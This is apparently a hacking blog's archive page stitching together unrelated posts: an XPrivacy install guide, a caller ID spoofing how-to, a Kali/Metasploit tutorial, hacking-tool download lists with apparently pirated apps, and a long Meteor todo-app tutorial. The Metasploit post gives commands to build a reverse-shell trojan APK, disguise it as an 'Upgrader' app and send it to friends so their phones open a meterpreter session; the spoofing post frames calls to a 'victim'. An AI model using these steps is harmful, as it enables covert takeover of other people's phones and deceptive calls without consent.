Never Ending Security

It starts all here

Category Archives: Mobile Phones & Tabs

Xprivacy – A Must Have App For Hackers

Xprivacy - Must Have App For Hackers
Do you care about your privacy more than anything? This app is just for you then. Introducing Xprivacy…. A simple android application (module) that allows you to change the app permissions
Xprivacy is actually an xposed module developed by M. Bokhorst (M66B) to prevent leaking of your private data. It can restrict the categories of data an application can access. For example, the famous game Angry Birds acquires phone numbers for no reason, you can block AngryBirds from accessing the phone numbers by feeding it with no or fake data using Xprivacy.


75% of apps that you installed on your phone or tablet are accessing your private data without your knowledge (for no reason).
Why you should care about your privacy ? Honestly, I don’t want to talk the boring stuff. I just want to say “If you are vulnerable or careless about your privacy, you will become a target for hackers”. Just remember the incidents happened last year, snapchat hack, celebrity hacks (Fappening) and more. If you don’t want to be a victim of a hack, you know what to do — care about your privacy.
Ready to use XPrivacy? Then, here are the things you must have, to install XPrivacy.


  • Your device must have proper root access.
  • XPosed Installer (Updated Framework).
  • SuperSU/superuser/Busybox.
  • Android 4.0.3 or later
If your device have proper root access, download Xposed Installer and then install it in your device. Then open Xposed installer, tap on “Framework“.

It will show a pop up box saying “In some cases, your device might no longer boot after installing Xposed. If you never heard about ‘soft brick’ and ‘boot loop’ before or if you don’t know how to recover from such a situation, do not install Xposed. In any case, having a recent backup is highly recommended.

Tap on “OK“. Then tap on “Install/ Update“.

Now, a pop up box will display (super user request). Just tap on” Grant“.
After the update,  It will show a message like this:
Tap on  “OK“.
After rebooting your device, open Xposed Installer… Then tap on “Download“.
Search for “XPrivacy” and then tap on it. Then select the “versions” tab and tap on “Download
After the download, it automatically opens Xprivacy Install page. Tap on “Install“. Then tap on “Done“.
Then go to the Xposed Installer again and tap on “Modules“. Enable Xprivacy and then restart your device.
For Kitkat and Lollipop users, after installing the Xprivacy, the device will display a notification -“Xposed Module is not activated. Activate & Reboot“. Just tap on “Activate & Reboot“.
Now the Xprivacy is ready to use.


Step 1: Find the application to restrict in the main application list.
Step 2: Tap on the application icon or name.
Step 3: Tap the first check box of any category you want to restrict. The second checkbox allows you to restrict category or function on demand. That is, the restrictions will be asked.
If you have any doubts using it, refer this:
If you are a non-rooted device, you can get the app called “UU AppPurifier” to block applications from accessing your private data.

How To Spoof Caller ID

spoof caller ID

Quick guide to learn how to spoof caller ID:

Do you want to call your friend as someone else? If yes, you are at the right place.

Before going into the how to guide, let’s take a look at some of the reasons to spoof caller ID:

  • Prank calls.
  • Impress your friends by calling from unique numbers like 000-000-0000 or 123-456-7890.
  • Hide your real phone number.
  • Call someone from a number that you want them to call back.
Note: Most of the services described in this article are banned in India and some other countries, so….if you experience any trouble while accessing the services, use a proxy website.

Proxy website:

Let’s start caller ID spoofing!

  • Using Crazy Call:

First, go to, and then select your country from the drop down menu.

spoof caller id using crazy call
Then enter the number you want to appear on the victim’s phone when he/she receives the call. Also fill the second box with the number of the person (victim) you want to fool.
If you want to change your voice, you can change it to low pitch or high picth.
Then click on the ” GET ME A CODE” button.
The page will reload and display a unique code and phone numbers:
caller id spoofing
Make a call from your phone to one of those numbers and enter the code when asked.
As soon as you enter the correct code, CrazyCall will connect your call to the victim with the CallerID and voice you have selected.
There are many free (trial) caller id spoofing services available, some of them are given below:
how to spoof caller ID
SpoofCard is a very good service that allows users to call from any number. It also has some interesting features such as voice changer, sound mixer, call recorder and group spoof. You can try a live demo for free. If you want more minutes, you have to buy the credits.

caller id spoofing using bluff my call
BluffMyCall spoofing service offers new features such as “Straight To Voice Mail” and “Call Notes” along with the features offered by SpoofCard.

spoof caller id using caller id faker
Caller ID Faker is just like a normal spoofing service. It doesn’t have any new features. You can try the service for free, unlimited usage available for $29.95.

change my number to another spooftel

SpoofTel is a nice service with SMS spoofing feature. You can try the service for FREE, but if you want more minutes, you have to buy the credits.
Here are some apps to spoof caller ID using an Android device:
If you are using an android phone, you can use caller ID spoofing apps like Caller Id Changer, Spoof Card – Anonymous Calling and CallerIDFaker.
Here is an app to spoof caller ID on iPhone (Free iPhone App):
If you are using an iOS device, you can use the SpoofCard iOS app to spoof your phone number.

How To Remotely Hack Android using Kali Linux

This is a tutorial explaining how to hack android phones with Kali.
I can’t see any tutorials explaining this Hack/Exploit, so, I made one.
(Still ,you may already know about this)

Step 1: Fire-Up Kali:

  • Open a terminal, and make a Trojan .apk
  • You can do this by typing :
  • msfpayload android/meterpreter/reverse_tcp LHOST= R > /root/Upgrader.apk (replace LHOST with your own IP)
  • You can also hack android on WAN i.e. through Interet by using yourPublic/External IP in the LHOST and by port forwarding (ask me about port forwarding if you have problems in the comment section)

Step 2: Open Another Terminal:

  • Open another terminal until the file is being produced.
  • Load metasploit console, by typing : msfconsole

Step 3: Set-Up a Listener:

  • After it loads(it will take time), load the multi-handler exploit by typing :use exploit/multi/handler
  • Set up a (reverse) payload by typing : set payload android/meterpreter/reverse_tcp
  • To set L host type : set LHOST (Even if you are hacking on WAN type your private/internal IP here not the public/external)

Step 4: Exploit!

  • At last type: exploit to start the listener.
  • Copy the application that you made (Upgrader.apk) from the root folder, to you android phone.
  • Then send it using Uploading it to Dropbox or any sharing website (
  • Then send the link that the Website gave you to your friends and exploit their phones (Only on LAN, but if you used the WAN method then you can use the exploit anywhere on the INTERNET)
  • Let the Victim install the Upgrader app(as he would think it is meant to upgrade some features on his phone)
  • However, the option of allowance for Installation of apps from Unknown Sources should be enabled (if not) from the security settings of the android phone to allow the Trojan to install.
  • And when he clicks Open…

Step 5: BOOM!

There comes the meterpreter prompt:

See Meterpreter commands here:

Android Hacking Tools and Apps


Download Android Hacking Tools Package 1

RAR Password = sabeer


Download Android Hacking Tools Complete Package
RAR Password = sabeer


03.APK Inspector.
04.Droid Box
05.Burp Suite
07.Droid Sheep
09.AppUse (Android Pentest Platform Unified Standalone Environment)
10.Shark for Root

11.Android File Manager
12.Arc File Manager
13.OI File Manager
14.File Manager
15.Aroma File Manager 1.91

16.Dodol Keyboard
17.Emoji Keyboard.apk
18.Ice Cream Sandwich Keyboard.apk
19.Jelly Bean Keyboard.apk
20.Keyboard ManMan.apk
21.Kii Keyboard.apk
22.Magic Keyboard Free.apk
23.Perfect Keyboard Free.apk
24.Red Keyboard Free.apk
25.TouchPal Keyboard.apk
26.TouchPal X Keyboard.apk
27.Dynamic Keyboard – Pro v1.9.1

28.AVP Evolution v1.5.1
29.Kingdom Rush Frontiers v1.0
30.Pacific Rim v1.6.0
31.Shadowrun Returns v1.0.5
32.Sine Mora v1.24

33.Advanced Task Manager Pro v3.1.9
34.AppMgr Pro III (App 2 SD) v3.19
35.BackCountry Navigator PRO GPS v5.1.
36.edjing PE – Turntables DJ Mix v1.3.0
37.Sliding Messaging Pro v7.60
38.TuneIn Radio Pro v9.1
39.wRotatr v1.408
43.Google Chrome

47.Flow Theme for CM10.2 v2.9.7

48.TSF Shell v1.

Hackode : The Hackers Toolbox App


Hackode : The hacker’s Toolbox is an application for penetration tester, Ethical hackers, IT administrator and Cyber security professional to perform different tasks like reconnaissance, scanning performing exploits etc.

This Application contains different tools like:-

* Reconnaissance
* Google Hacking
* Google Dorks
* Whois
* Scanning
* Ping
* Traceroute
* DNS lookup
* IP
* MX Records
* DNS Dig
* Exploits
* Security Rss Feed

This Application is still in beta version. It will be releasing soon its full version with some more better tools and utilities. Stay tuned for more updates.

Download Now

Nuke-IOS – Automated ARP poisoning script for IOS

Nuke-IOS (beta)

Automated ARP poisoning script for IOS

Just an auditing tool to test ARP attacks, can easily be avoided using Static-ARP entries on hosts or with AP isolation.

Soon I’ll explain the support for SBsettings toggle, yes, one simple button that takes down an entire /24 network in seconds.

Depends on:

mptcp network-cmds

More information can be found at:

Maldroid – An Simple Framework To Extract Actionable Data From Android Malware (C&Cs, phone numbers etc.) .


Simple framework to extract “actionable” data from Android malware (C&Cs, phone numbers etc.)


You have to install the following packets before you start using this project:

  • Androguard (git clone; cd androguard; sudo python install)
  • PyCrypto (easy_install pycrypto)
  • pyelftools (easy_install pyelftools)
  • yara (easy_install yara)


Idea is really simple and modular. The project has couple of directories, which host a place for you static analysis or output processing:

  • plugins – this is were the code responsible for the malware identification and data extraction is. Every class has to inherit from Plugin class from templates.
    • Method recon idetifies the malware – put there all of the code you need to make sure you can extract the data.
    • Method extract does the usual extraction. There is no specific format for the extracted data, but it’s good to keep it in Python dictionary, so that the ouput processors could read it in a uniform way.
  • processing – this is were you put classes that inherit from OutputProcessor class. They are invoked after the data extraction and get the extracted info.
    • process method takes the data and produces some kind of a result (i.e. adds a file or C&C to you database, checks if the C&C is live etc.)

If you want to contribute, write a plugin that decodes some new malware family. It’s easy, just look at the existing plugins.


So, you have an APK sample and you don’t know what it is and where is the C&C? Type:

python [sample_path]

If maldrolyzer knows the malware family it will display some useful information like:

{'c2': [''],
 'malware': 'xbot007',
 'md5': 'ce17e4b04536deac4672b98fbee905e0',
 'sha1': 'a48a2b8a5e1cae168ea42bd271f5b5a0c65f59a9',
 'sha256': 'c3a24d1df11baf2614d7b934afba897ce282f961e2988ac7fa85e270e3b3ea7d',
 'sha512': 'a47f3db765bff9a8d794031632a3cf98bffb3e833f90639b18be7e4642845da2ee106a8947338b9244f50b918a32f1a6a952bb18a1f86f8c176e81c2cb4862b9'}

And you can track the C&Cs from several malware families using

More information can be found at:

Meteor – a complete open source platform for building web and mobile apps in pure JavaScript

Meteor is a complete open source platform
for building web and mobile apps
in pure JavaScript.

Installing Meteor

Meteor supports OS X, Windows, and Linux.

On Windows? Download the official Meteor installer here.

On OS X or Linux? Install the latest official Meteor release from your terminal:

curl | sh

The Windows installer supports Windows 7, Windows 8.1, Windows Server 2008, and Windows Server 2012. The command line installer supports Mac OS X 10.7 (Lion) and above, and Linux on x86 and x86_64 architectures.

Now that you’ve installed Meteor, check out the tutorial that teaches you how to build a collaborative todo list app while showing you Meteor’s most exciting and useful features. You can also read about the design of the Meteor platform or check out the complete documentation.

Creating your first app

To create a Meteor app, open your terminal and type:

meteor create simple-todos

This will create a new folder called simple-todos with all of the files that a Meteor app needs:

simple-todos.js       # a JavaScript file loaded on both client and server
simple-todos.html     # an HTML file that defines view templates
simple-todos.css      # a CSS file to define your app's styles
.meteor               # internal Meteor files

To run the newly created app:

cd simple-todos

Open your web browser and go to http://localhost:3000 to see the app running.

You can play around with this default app for a bit before we continue. For example, try editing the text in<h1> inside simple-todos.html using your favorite text editor. When you save the file, the page in your browser will automatically update with the new content. We call this “hot code push”.

Now that you have some experience editing the files in your Meteor app, let’s start working on a simple todo list application.

See the code for step 1 on GitHub!

Defining views with templates

To start working on our todo list app, let’s replace the code of the default starter app with the code below. Then we’ll talk about what it does.

<!-- simple-todos.html -->
  <title>Todo List</title>

  <div class="container">
      <h1>Todo List</h1>

      {{#each tasks}}
        {{> task}}

<template name="task">
// simple-todos.js
if (Meteor.isClient) {
  // This code only runs on the client
    tasks: [
      { text: "This is task 1" },
      { text: "This is task 2" },
      { text: "This is task 3" }

In our browser, the app will now look much like this:

Todo List

  • This is task 1
  • This is task 2
  • This is task 3

Now let’s find out what all these bits of code are doing!

HTML files in Meteor define templates

Meteor parses all of the HTML files in your app folder and identifies three top-level tags: <head>, <body>, and <template>.

Everything inside any <head> tags is added to the head section of the HTML sent to the client, and everything inside <body> tags is added to the body section, just like in a regular HTML file.

Everything inside <template> tags is compiled into Meteor templates, which can be included inside HTML with {{> templateName}} or referenced in your JavaScript with Template.templateName.

Adding logic and data to templates

All of the code in your HTML files is compiled with Meteor’s Spacebars compiler. Spacebars uses statements surrounded by double curly braces such as {{#each}} and {{#if}} to let you add logic and data to your views.

You can pass data into templates from your JavaScript code by defining helpers. In the code above, we defined a helper called tasks on Template.body that returns an array. Inside the body tag of the HTML, we can use {{#each tasks}} to iterate over the array and insert a task template for each value. Inside the #eachblock, we can display the text property of each array item using {{text}}.

In the next step, we will see how we can use helpers to make our templates display dynamic data from a database collection.

Adding CSS

Before we go any further, let’s make our app look nice by adding some CSS.

Since this tutorial is focused on working with HTML and JavaScript, just copy all the CSS code below intosimple-todos.css. This is all the CSS code you will need until the end of the tutorial. The app will still work without the CSS, but it will look much nicer if you add it.

Replace simple-todos.css with this codeSelect All
/* CSS declarations go here */
body {
  font-family: sans-serif;
  background-color: #315481;
  background-image: linear-gradient(to bottom, #315481, #918e82 100%);
  background-attachment: fixed;

  position: absolute;
  top: 0;
  bottom: 0;
  left: 0;
  right: 0;

  padding: 0;
  margin: 0;

  font-size: 14px;

.container {
  max-width: 600px;
  margin: 0 auto;
  min-height: 100%;
  background: white;

header {
  background: #d2edf4;
  background-image: linear-gradient(to bottom, #d0edf5, #e1e5f0 100%);
  padding: 20px 15px 15px 15px;
  position: relative;

#login-buttons {
  display: block;

h1 {
  font-size: 1.5em;
  margin: 0;
  margin-bottom: 10px;
  display: inline-block;
  margin-right: 1em;

form {
  margin-top: 10px;
  margin-bottom: -10px;
  position: relative;

.new-task input {
  box-sizing: border-box;
  padding: 10px 0;
  background: transparent;
  border: none;
  width: 100%;
  padding-right: 80px;
  font-size: 1em;

.new-task input:focus{
  outline: 0;

ul {
  margin: 0;
  padding: 0;
  background: white;

.delete {
  float: right;
  font-weight: bold;
  background: none;
  font-size: 1em;
  border: none;
  position: relative;

li {
  position: relative;
  list-style: none;
  padding: 15px;
  border-bottom: #eee solid 1px;

li .text {
  margin-left: 10px;

li.checked {
  color: #888;

li.checked .text {
  text-decoration: line-through;

li.private {
  background: #eee;
  border-color: #ddd;

header .hide-completed {
  float: right;

.toggle-private {
  margin-left: 5px;

@media (max-width: 600px) {
  li {
    padding: 12px 15px;

  .search {
    width: 150px;
    clear: both;

  .new-task input {
    padding-bottom: 5px;
See the code for step 2 on GitHub!

Storing tasks in a collection

Collections are Meteor’s way of storing persistent data. The special thing about collections in Meteor is that they can be accessed from both the server and the client, making it easy to write view logic without having to write a lot of server code. They also update themselves automatically, so a template backed by a collection will automatically display the most up-to-date data.

Creating a new collection is as easy as calling MyCollection = new Mongo.Collection("my-collection"); in your JavaScript. On the server, this sets up a MongoDB collection called my-collection; on the client, this creates a cache connected to the server collection. We’ll learn more about the client/server divide in step 12, but for now we can write our code with the assumption that the entire database is present on the client.

Let’s update our JavaScript code to get our tasks from a collection instead of a static array:

// simple-todos.js
Tasks = new Mongo.Collection("tasks");

if (Meteor.isClient) {
  // This code only runs on the client
    tasks: function () {
      return Tasks.find({});

When you make these changes to the code, you’ll notice that the tasks that used to be in the todo list have disappeared. That’s because our database is currently empty — we need to insert some tasks!

Inserting tasks from the console

Items inside collections are called documents. Let’s use the server database console to insert some documents into our collection. In a new terminal tab, go to your app directory and type:

meteor mongo

This opens a console into your app’s local development database. Into the prompt, type:

db.tasks.insert({ text: "Hello world!", createdAt: new Date() });

In your web browser, you will see the UI of your app immediately update to show the new task. You can see that we didn’t have to write any code to connect the server-side database to our front-end code — it just happened automatically.

Insert a few more tasks from the database console with different text. In the next step, we’ll see how to add functionality to our app’s UI so that we can add tasks without using the database console.

See the code for step 3 on GitHub!

Adding tasks with a form

In this step, we’ll add an input field for users to add tasks to the list.

First, let’s add a form to our HTML:

  <h1>Todo List</h1>

  <!-- add a form below the h1 -->
  <form class="new-task">
    <input type="text" name="text" placeholder="Type to add new tasks" />

Here’s the JavaScript code we need to add to listen to the submit event on the form:

// Inside the if (Meteor.isClient) block, right after Template.body.helpers:{
  "submit .new-task": function (event) {
    // This function is called when the new task form is submitted

    var text =;

      text: text,
      createdAt: new Date() // current time

    // Clear form = "";

    // Prevent default form submit
    return false;

Now your app has a new input field. To add a task, just type into the input field and hit enter. If you open a new browser window and open the app again, you’ll see that the list is automatically synchronized between all clients.

Attaching events to templates

Event listeners are added to templates in much the same way as helpers are: by with a dictionary. The keys describe the event to listen for, and the values are event handlers that are called when the event happens.

In our case above, we are listening to the submit event on any element that matches the CSS selector .new-task. When this event is triggered by the user pressing enter inside the input field, our event handler function is called.

The event handler gets an argument called event that has some information about the event that was triggered. In this case is our form element, and we can get the value of our input You can see all of the other properties of the event object by adding aconsole.log(event) and inspecting the object in your browser console.

The last two lines of our event handler perform some cleanup — first we make sure to make the input blank, and then we return false to tell the web browser to not do the default form submit action since we have already handled it.

Inserting into a collection

Inside the event handler, we are adding a task to the tasks collection by calling Tasks.insert(). We can assign any properties to the task object, such as the time created, since we don’t ever have to define a schema for the collection.

Being able to insert anything into the database from the client isn’t very secure, but it’s okay for now. In step 10 we’ll learn how we can make our app secure and restrict how data is inserted into the database.

Sorting our tasks

Currently, our code displays all new tasks at the bottom of the list. That’s not very good for a task list, because we want to see the newest tasks first.

We can solve this by sorting the results using the createdAt field that is automatically added by our new code. Just add a sort option to the find call inside the tasks helper:

  tasks: function () {
    // Show newest tasks first
    return Tasks.find({}, {sort: {createdAt: -1}});

In the next step, we’ll add some very important todo list functions: checking off and deleting tasks.

See the code for step 4 on GitHub!

Checking off and deleting tasks

Until now, we have only interacted with a collection by inserting documents. Now, we will learn how to update and remove them.

Let’s add two elements to our task template, a checkbox and a delete button:

<!-- replace the existing task template with this code -->
<template name="task">
  <li class="{{#if checked}}checked{{/if}}">
    <button class="delete">&times;</button>

    <input type="checkbox" checked="{{checked}}" class="toggle-checked" />

    <span class="text">{{text}}</span>

We have added UI elements, but they don’t do anything yet. We should add some event handlers:

// In the client code, below everything else{
  "click .toggle-checked": function () {
    // Set the checked property to the opposite of its current value
    Tasks.update(this._id, {$set: {checked: ! this.checked}});
  "click .delete": function () {

Getting data in event handlers

Inside the event handlers, this refers to an individual task object. In a collection, every inserted document has a unique _id field that can be used to refer to that specific document. We can get the _id of the current task with this._id. Once we have the _id, we can use update and remove to modify the relevant task.


The update function on a collection takes two arguments. The first is a selector that identifies a subset of the collection, and the second is an update parameter that specifies what should be done to the matched objects.

In this case, the selector is just the _id of the relevant task. The update parameter uses $set to toggle thechecked field, which will represent whether the task has been completed.


The remove function takes one argument, a selector that determines which item to remove from the collection.

Using object properties or helpers to add/remove classes

If you try checking off some tasks after adding all of the above code, you will see that checked off tasks have a line through them. This is enabled by the following snippet:

<li class="{{#if checked}}checked{{/if}}">

With this code, if the checked property of a task is true, the checked class is added to our list item. Using this class, we can make checked-off tasks look different in our CSS.

See the code for step 5 on GitHub!

Deploying your app

Now that we have a working todo list app, we can share it with our friends! Meteor makes it really easy to put an app up on the internet where other people can use it.

Simply go to your app directory, and type:

meteor deploy

Once you answer all of the prompts and the upload completes, you can go to and use your app from anywhere.

Try opening the app on multiple devices such as your phone and your friend’s computer. Add, remove, and check off some tasks and you will see that the UI of your app is really fast. That’s because Meteor doesn’t wait for the server to respond before updating the interface – we’ll talk about this more in step 11.

Congratulations, you’ve made a working app that you can now use with your friends! In later steps we will add more functionality involving multiple users, private tasks, and search. First, we’ll take a detour to see that while we were building a web app, we also created a pretty nice mobile app along the way.

Running your app on Android or iOS

So far, we’ve been building our app and testing only in a web browser, but Meteor has been designed to work across different platforms – your simple todo list website can become an iOS or Android app in just a few commands.

Meteor makes it easy to set up all of the tools required to build mobile apps, but downloading all of the programs can take a while – for Android the download is about 300MB and for iOS you need to install Xcode which is about 2GB. If you don’t want to wait to download these tools, feel free to skip to the next step.

Running on an Android emulator

In the terminal, go to your app folder and type:

meteor install-sdk android

This will help you install all of the necessary tools to build an Android app from your project. When you are done installing everything, type:

meteor add-platform android

After you agree to the license terms, type:

meteor run android

After some initialization, you will see an Android emulator pop up, running your app inside a native Android wrapper. The emulator can be somewhat slow, so if you want to see what it’s really like using your app, you should run it on an actual device.

Running on an Android device

First, complete all of the steps above to set up the Android tools on your system. Then, make sure you haveUSB Debugging enabled on your phone and the phone is plugged into your computer with a USB cable. Also, you must quit the Android emulator before running on a device.

Then, run the following command:

meteor run android-device

The app will be built and installed on your device. If you want to point your app to the server you deployed in the previous step, run:

meteor run android-device --mobile-server

Running on an iOS simulator (Mac Only)

If you have a Mac, you can run your app inside the iOS simulator.

Go to your app folder and type:

meteor install-sdk ios

This will run you through the setup necessary to build an iOS app from your project. When you’re done, type:

meteor add-platform ios
meteor run ios

You will see the iOS simulator pop up with your app running inside.

Running on an iPhone or iPad (Mac Only; requires Apple developer account)

If you have an Apple developer account, you can also run your app on an iOS device. Run the following command:

meteor run ios-device

This will open Xcode with a project for your iOS app. You can use Xcode to then launch the app on any device or simulator that Xcode supports.

If you want to point your app at the previously deployed server, run:

meteor run ios-device --mobile-server

Now that we have seen how easy it is to deploy our app and run it on mobile, let’s get to adding some more features.

Storing temporary UI state in Session

In this step, we’ll add a client-side data filtering feature to our app, so that users can check a box to only see incomplete tasks. We’re going to learn how to use Session to store temporary reactive state on the client.

First, we need to add a checkbox to our HTML:

<!-- add the checkbox to <body> right below the h1 -->
<label class="hide-completed">
  <input type="checkbox" checked="{{hideCompleted}}" />
  Hide Completed Tasks

Then, we need an event handler to update a Session variable when the checkbox is checked or unchecked.Session is a convenient place to store temporary UI state, and can be used in helpers just like a collection.

// Add to
"change .hide-completed input": function (event) {

Now, we need to update Template.body.helpers. The code below has a new if block to filter the tasks if the checkbox is checked, and a helper to make sure the checkbox represents the state of our Session variable.

// Replace the existing Template.body.helpers
  tasks: function () {
    if (Session.get("hideCompleted")) {
      // If hide completed is checked, filter tasks
      return Tasks.find({checked: {$ne: true}}, {sort: {createdAt: -1}});
    } else {
      // Otherwise, return all of the tasks
      return Tasks.find({}, {sort: {createdAt: -1}});
  hideCompleted: function () {
    return Session.get("hideCompleted");

Now if you check the box, the task list will only show tasks that haven’t been completed.

Session is a reactive data store for the client

Until now, we have stored all of our state in collections, and the view updated automatically when we modified the data inside these collections. This is because Meteor.Collection is recognized by Meteor as areactive data source, meaning Meteor knows when the data inside has changed. Session is the same way, but is not synced with the server like collections are. This makes Session a convenient place to store temporary UI state like the checkbox above. Just like with collections, we don’t have to write any extra code for the template to update when the Session variable changes — just calling Session.get(...) inside the helper is enough.

One more feature: Showing a count of incomplete tasks

Now that we have written a query that filters out completed tasks, we can use the same query to display a count of the tasks that haven’t been checked off. To do this we need to add a helper and change one line of the HTML.

// Add to Template.body.helpers
incompleteCount: function () {
  return Tasks.find({checked: {$ne: true}}).count();
<!-- display the count at the end of the <h1> tag -->
<h1>Todo List ({{incompleteCount}})</h1>
See the code for step 8 on GitHub!

Adding user accounts

Meteor comes with an accounts system and a drop-in login user interface that lets you add multi-user functionality to your app in minutes.

To enable the accounts system and UI, we need to add the relevant packages. In your app directory, run the following command:

meteor add accounts-ui accounts-password

In the HTML, right under the checkbox, include the following code to add a login dropdown:

{{> loginButtons}}

Then, in your JavaScript, add the following code to configure the accounts UI to use usernames instead of email addresses:

// At the bottom of the client code
  passwordSignupFields: "USERNAME_ONLY"

Now users can create accounts and log into your app! This is very nice, but logging in and out isn’t very useful yet. Let’s add two functions:

  1. Only display the new task input field to logged in users
  2. Show which user created each task

To do this, we will add two new fields to the tasks collection:

  1. owner – the _id of the user that created the task.
  2. username – the username of the user that created the task. We will save the username directly in the task object so that we don’t have to look up the user every time we display the task.

First, let’s add some code to save these fields into the submit .new-task event handler:

  text: text,
  createdAt: new Date(),            // current time
  owner: Meteor.userId(),           // _id of logged in user
  username: Meteor.user().username  // username of logged in user

Then, in our HTML, add an #if block helper to only show the form when there is a logged in user:

{{#if currentUser}}
  <form class="new-task">
    <input type="text" name="text" placeholder="Type to add new tasks" />

Finally, add a Spacebars statement to display the username field on each task right before the text:

<span class="text"><strong>{{username}}</strong> - {{text}}</span>

Now, users can log in and we can track which user each task belongs to. Let’s look at some of the concepts we just discovered in more detail.

Automatic accounts UI

If our app has the accounts-ui package, all we have to do to add a login dropdown is include theloginButtons template with {{> loginButtons}}. This dropdown detects which login methods have been added to the app and displays the appropriate controls. In our case, the only enabled login method is accounts-password, so the dropdown displays a password field. If you are adventurous, you can add the accounts-facebook package to enable Facebook login in your app – the Facebook button will automatically appear in the dropdown.

Getting information about the logged-in user

In your HTML, you can use the built-in {{currentUser}} helper to check if a user is logged in and get information about them. For example, {{currentUser.username}} will display the logged in user’s username.

In your JavaScript code, you can use Meteor.userId() to get the current user’s _id, or Meteor.user() to get the whole user document.

In the next step, we will learn how to make our app more secure by doing all of our data validation on the server instead of the client.

See the code for step 9 on GitHub!

Security with methods

Before this step, any user of the app could edit any part of the database. This might be okay for very small internal apps or demos, but any real application needs to control permissions for its data. In Meteor, the best way to do this is by declaring methods. Instead of the client code directly calling insert, update, andremove, it will instead call methods that will check if the user is authorized to complete the action and then make any changes to the database on the client’s behalf.

Removing insecure

Every newly created Meteor project has the insecure package added by default. This is the package that allows us to edit the database from the client. It’s useful when prototyping, but now we are taking off the training wheels. To remove this package, go to your app directory and run:

meteor remove insecure

If you try to use the app after removing this package, you will notice that none of the inputs or buttons work anymore. This is because all client-side database permissions have been revoked. Now we need to rewrite some parts of our app to use methods.

Defining methods

First, we need to define some methods. We need one method for each database operation we want to perform on the client. Methods should be defined in code that is executed on the client and the server – we will discuss this a bit later in the section titled Latency compensation.

// At the bottom of simple-todos.js, outside of the client-only block
  addTask: function (text) {
    // Make sure the user is logged in before inserting a task
    if (! Meteor.userId()) {
      throw new Meteor.Error("not-authorized");

      text: text,
      createdAt: new Date(),
      owner: Meteor.userId(),
      username: Meteor.user().username
  deleteTask: function (taskId) {
  setChecked: function (taskId, setChecked) {
    Tasks.update(taskId, { $set: { checked: setChecked} });

Now that we have defined our methods, we need to update the places we were operating on the collection to use the methods instead:

// replace Tasks.insert( ... ) with:"addTask", text);

// replace Tasks.update( ... ) with:"setChecked", this._id, ! this.checked);

// replace Tasks.remove( ... ) with:"deleteTask", this._id);

Now all of our inputs and buttons will start working again. What did we gain from all of this work?

  1. When we insert tasks into the database, we can now securely verify that the user is logged in, that thecreatedAt field is correct, and that the owner and username fields are correct and the user isn’t impersonating anyone.
  2. We can add extra validation logic to setChecked and deleteTask in later steps when users can make tasks private.
  3. Our client code is now more separated from our database logic. Instead of a lot of stuff happening inside our event handlers, we now have methods that can be called from anywhere.

Latency compensation

So why do we want to define our methods on the client and on the server? We do this to enable a feature called latency compensation.

When you call a method on the client using, two things happen in parallel:

  1. The client sends a request to the server to run the method in a secure environment, just like an AJAX request would work
  2. A simulation of the method runs directly on the client to attempt to predict the outcome of the server call using the available information

What this means is that a newly created task actually appears on the screen before the result comes back from the server.

If the result from the server comes back and is consistent with the simulation on the client, everything remains as is. If the result on the server is different from the result of the simulation on the client, the UI is patched to reflect the actual state of the server.

With Meteor methods and latency compensation, you get the best of both worlds — the security of server code and no round-trip delay.

See the code for step 10 on GitHub!

Filtering data with publish and subscribe

Now that we have moved all of our app’s sensitive code into methods, we need to learn about the other half of Meteor’s security story. Until now, we have worked assuming the entire database is present on the client, meaning if we call Tasks.find() we will get every task in the collection. That’s not good if users of our application want to store privacy-sensitive data. We need a way of controlling which data Meteor sends to the client-side database.

Just like with insecure in the last step, all new Meteor apps start with the autopublish package. Let’s remove it and see what happens:

meteor remove autopublish

When the app refreshes, the task list will be empty. Without the autopublish package, we will have to specify explicitly what the server sends to the client. The functions in Meteor that do this are Meteor.publish andMeteor.subscribe.

Let’s add them now.

// At the bottom of simple-todos.js
if (Meteor.isServer) {
  Meteor.publish("tasks", function () {
    return Tasks.find();
// At the top of our client code

Once you have added this code, all of the tasks will reappear.

Calling Meteor.publish on the server registers a publication named "tasks". When Meteor.subscribe is called on the client with the publication name, the client subscribes to all the data from that publication, which in this case is all of the tasks in the database. To truly see the power of the publish/subscribe model, let’s implement a feature that allows users to mark tasks as “private” so that no other users can see them.

Implementing private tasks

First, let’s add another property to tasks called “private” and a button for users to mark a task as private. This button should only show up for the owner of a task. It will display the current state of the item.

<!-- add right below the code for the checkbox in the task template -->
{{#if isOwner}}
  <button class="toggle-private">
    {{#if private}}

<!-- modify the li tag to have the private class if the item is private -->
<li class="{{#if checked}}checked{{/if}} {{#if private}}private{{/if}}">

We need to modify our JavaScript code in three places:

// Define a helper to check if the current user is the task owner
  isOwner: function () {
    return this.owner === Meteor.userId();

// Add an event for the new button to
"click .toggle-private": function () {"setPrivate", this._id, ! this.private);

// Add a method to Meteor.methods called setPrivate
setPrivate: function (taskId, setToPrivate) {
  var task = Tasks.findOne(taskId);

  // Make sure only the task owner can make a task private
  if (task.owner !== Meteor.userId()) {
    throw new Meteor.Error("not-authorized");

  Tasks.update(taskId, { $set: { private: setToPrivate } });

Now that we have a way of setting which tasks are private, we should modify our publication function to only send the tasks that a user is authorized to see:

// Modify the publish statement
// Only publish tasks that are public or belong to the current user
Meteor.publish("tasks", function () {
  return Tasks.find({
    $or: [
      { private: {$ne: true} },
      { owner: this.userId }

To test that this functionality works, you can use your browser’s private browsing mode to log in as a different user. Put the two windows side by side and mark a task private to confirm that the other user can’t see it. Now make it public again and it will reappear!

In order to finish up our private task feature, we need to add checks to our deleteTask and setCheckedmethods to make sure only the task owner can delete or check off a private task:

// Inside the deleteTask method
var task = Tasks.findOne(taskId);
if (task.private && task.owner !== Meteor.userId()) {
  // If the task is private, make sure only the owner can delete it
  throw new Meteor.Error("not-authorized");

// Inside the setChecked method
var task = Tasks.findOne(taskId);
if (task.private && task.owner !== Meteor.userId()) {
  // If the task is private, make sure only the owner can check it off
  throw new Meteor.Error("not-authorized");

We’re done with our private task feature! Now our app is secure from attackers trying to view or modify someone’s private tasks.

See the code for step 11 on GitHub!

What’s next?

Congratulations on your newly built Meteor app! Don’t forget to deploy it again so your friends can use the new features.

Your app currently supports collaborating on a single todo list. To see how you could add more functionality, check out the Todos example — a more complete app that can handle sharing multiple lists. Also, try Local Market, a cross-platform customer engagement app that shows off native hardware functionality and social features.

meteor create --example todos
meteor create --example localmarket

Here are some options for where you can go next:

  1. Grab a copy of Discover Meteor, the best Meteor book out there
  2. Read about the design of the Meteor platform to see how all of the parts fit together
  3. Check out the complete documentation

More information can be found on:

Best Android Tools For Security Audit and Hacking

Best Android Tools For Security Audit and Hacking

